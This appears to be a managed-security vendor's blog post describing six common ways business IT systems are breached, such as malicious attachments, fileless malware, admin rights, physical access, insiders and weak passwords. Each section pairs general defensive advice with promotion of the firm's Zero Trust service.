The Most Common Security Breaches
Attacks on systems by malware are increasing dramatically every month and solid cybersecurity has never been more challenging. One of the best ways to stay protected is to be aware of cybersecurity threats. With that in mind, here are six common ways your IT systems can be broken into.
You are tricked into installing malicious software
There are many ways you can be tricked into downloading and installing malware. One is by clicking on an infected attachment.
Many firms will accept and open an email if it comes in response to a job posting you are looking to fill and the hacker sends you a resume in a Word doc or PDF.
Here are some steps you can take to avoid accidentally installing malware:
- Never download files from an untrusted source. If a website is asking you to download something, make sure it’s reputable and reliable. Double check the URL of the website to verify it is legit.
- Always look at the name of the file before downloading. Malware is often deliberately given names similar to those of legitimate files, with only a slight spelling change or some unusual wording. If you are unsure about the file, then don’t download it or click on it.
- Always scan a file before installing it. Make sure you use an email threat detection software to help screen out those malicious files before opening them
Visiting legitimate-looking websites that actually are malicious
Fileless malware is a type of malicious software that differs from many other malware threats.
Cybercriminals often seek ways to install malicious files on your computer. But a fileless attack doesn’t require that. Instead, fileless malware is stealthier in its activation of tools, software and applications that are already built in to your operating system.
That malware then hides in your system.
Fileless malware piggybacks on legitimate scripts by executing malicious activity while the legitimate programs continue to run.
Fileless malware can remain undetected because it’s memory-based, not file-based. Antivirus software works with other types of malware because it detects the traditional “footprints” of a signature.
In contrast, fileless malware leaves no footprints for antivirus products to detect.
Cybercriminals create fraudulent websites that are designed to appear legitimate. When users visit these pages, the websites look for vulnerabilities in the Flash and other browser plugins, which allow malicious code to run in the browser memory. These sites typically impersonate legitimate sites by using similar characters in the URL like, rn (RN) in place of an m (M), capital (I) in place of small (L), 00 in place of oo….
The key is that fileless malware isn’t written to disk like traditional malware. Rather, fileless malware is written directly to RAM — random access memory — which doesn’t leave behind those traditional traces of its existence.
This type of malware works in-memory and its operation ends when your system reboots. This adds another layer of challenge to the forensics that would help you figure out what happened and know what to look for to prevent future attacks.
There isn’t a simple, updated virus definition file or all-encompassing antivirus tool to guard against fileless malware attacks.
Legacy antivirus solutions, once relied upon, no longer get the job done.
We offer protection from this type of attack by restricting what your legitimate programs can run and what they can interact with. This is called Zero Trust security.
Hackers obtain admin privileges
Many users are logged into their computers as admins. Being an administrator allows you to change settings, install programs, and manage other accounts. This is a major problem because if you are hacked, they now have full access to install other malicious software, change settings, or completely take over the machine.
Hackers will then attempt to move laterally through your network to gain access to your server and firewall and begin to plan how they can extort you.
To avoid this, you must limit the administrator role only to users who need it. Users should be logged on as users and not as admins.
The role of our Zero Trust approach here is to ensure that even if a hacker gets access to your network, they will not be able to download files, run any executable software or move laterally because their access will be completely restricted.
Someone physically accesses your computer
Your system can also get infected with malware or your data can get stolen because someone physically accessed your systems.
If you leave your computer unlocked when you go out for lunch. Someone can just walk up to it and plug in a malware-infected USB drive, and you are compromsed.
An easy way to defend against this is to secure your computer with an automatic timeout and a 2-factor authentication. You should also lock, or log off from your computer whenever you step away from it.
With our Zero trust approach, we disable drives like CD/DVD and USB storage devices. Doing so will limit the chances of anyone using any removable media to infect your computer or steal data from it.
Restricting what users or computers can do, and only allowing what is required to perform their duties is part of the Zero Trust architecture we implement to protect against an attack from inside.
Someone from within the company infects the system
A disgruntled employee can compromise your IT systems. They can do a tremendous amount of damage such as deleting essential data or introducing highly destructive malware.
For most organizations, it is not an employee with malicious intent but rather, it is someone who is unaware that they are infecting the companies’ systems because of the many ways that compromises happen.
The most effective way to prevent this is to is to limit what users can access, change, and view. This means designing your overall network and user access so that they only can access what they are allowed to, and the systems themselves are restricted from accessing unauthorized resources.
For example, there is no need for users or their computers, to access your data backups. With our Zero Trust approach, we provide these restrictions so that you are protected against insider attacks. We block the use of unauthorized USB drives from even connecting to your systems or we can authorize a specific USB drive or allow USB drives to only upload or download specific files like pictures ( .jpeg or .PNG files).
By using our Zero Trust approach, both malicious and non-malicious users are treated the same and are restricted from accidentally or intentionally compromising your systems
Your password is compromised
Passwords are typically the main verification method businesses use to access their accounts and systems. The issue with this is that many people have weak passwords that are easy to crack. To make matters worse, many people even use the same password for multiple accounts, which could lead to a massive breach.
An 8 digit password can be compromised in a brute force attack in under 1 hour.
It is therefore important to use 2 factor authentication for access to your systems.
2 factor Authentication is made up of:
Something you know: This could be a personal identification number (PIN), a password, answers to “secret questions” or a specific keystroke pattern
Something you have: Typically, a user would have something in their possession, like a credit card, a smartphone, or a small hardware token
Something you are: This category is more advanced, and might include biometric data like a fingerprint, an iris scan, or a voice print.
This may seem like an inconvenience, but we have found that users quickly get accustomed to using 2FA and embrace it once they realize how easy it is to hack simple passwords. Many users are already using 2FA for their banking apps and other mobile apps.
The goal of our Zero Trust Managed Security offering is to use a suite of threat hunting tools combined with user training and granular controls to build a functional ecosystem that removes as much risk of an attack from users and their devices.
By accident or not – we make it impossible for unwitting errors to cause a compromise